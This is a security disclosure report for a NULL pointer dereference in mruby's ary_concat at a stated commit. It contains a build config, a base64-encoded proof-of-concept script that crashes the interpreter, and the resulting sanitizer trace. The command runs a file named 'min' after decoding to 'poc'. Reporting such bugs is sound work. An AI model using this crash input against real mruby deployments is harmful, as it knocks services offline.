There is a NULL Pointer Dereference in ary_concat
(array.c:301
). This bug has been found on mruby lastest commit (hash ecb28f4bf463483cf914c799d086b0cfff997aee
) on Ubuntu 20.04 for x86_64/amd64.
The crash is not reproducible in a debug build, so a release build config must be used to reproduce it:
1- Clone repo and build with ASAN (but in non-debug mode) using MRUBY_CONFIG=build_config/poc_config.rb rake
. With poc_config.rb
being:
MRuby::Build.new do |conf|
conf.toolchain :clang
# include the GEM box
conf.gembox 'full-core'
conf.enable_sanitizer "address,undefined"
conf.enable_bintest
conf.enable_test
end
2- Use mruby to execute the poc (it is base64-encoded since it contains unprintable characters):
$ echo -ne 'R0M6OmNsYXNzLm5ld3tzdXBlciBzdXBlciBzdXBlcigmKQpiPTAsKuk9MH0=' | base64 -d > poc
$ ~/mruby/build/host/bin/mruby min
/home/faraday/mruby/src/array.c:301:7: runtime error: member access within misaligned address 0x000000000001 for type 'struct RArray', which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/array.c:301:7 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==54835==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000012 (pc 0x00000055a515 bp 0x7ffe088eb5d0 sp 0x7ffe088ea940 T0)
==54835==The signal is caused by a READ memory access.
==54835==Hint: address points to the zero page.
#0 0x55a515 in ary_concat /home/faraday/mruby/src/array.c:301:7
#1 0x55a515 in mrb_ary_concat /home/faraday/mruby/src/array.c:324:3
#2 0x5ae1c9 in mrb_vm_exec /home/faraday/mruby/src/vm.c:2622:9
#3 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
#4 0x53f5b4 in mrb_mod_initialize /home/faraday/mruby/src/class.c:1648:5
#5 0x5bc37b in mrb_vm_exec /home/faraday/mruby/src/vm.c:1633:18
#6 0x59ad77 in mrb_vm_run /home/faraday/mruby/src/vm.c:1128:12
#7 0x692370 in mrb_load_exec /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6883:7
#8 0x69341f in mrb_load_detect_file_cxt /home/faraday/mruby/mrbgems/mruby-compiler/core/parse.y:6926:12
#9 0x4c69ee in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
#10 0x7f6682c1d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x41c83d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41c83d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/array.c:301:7 in ary_concat
==54835==ABORTING
This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.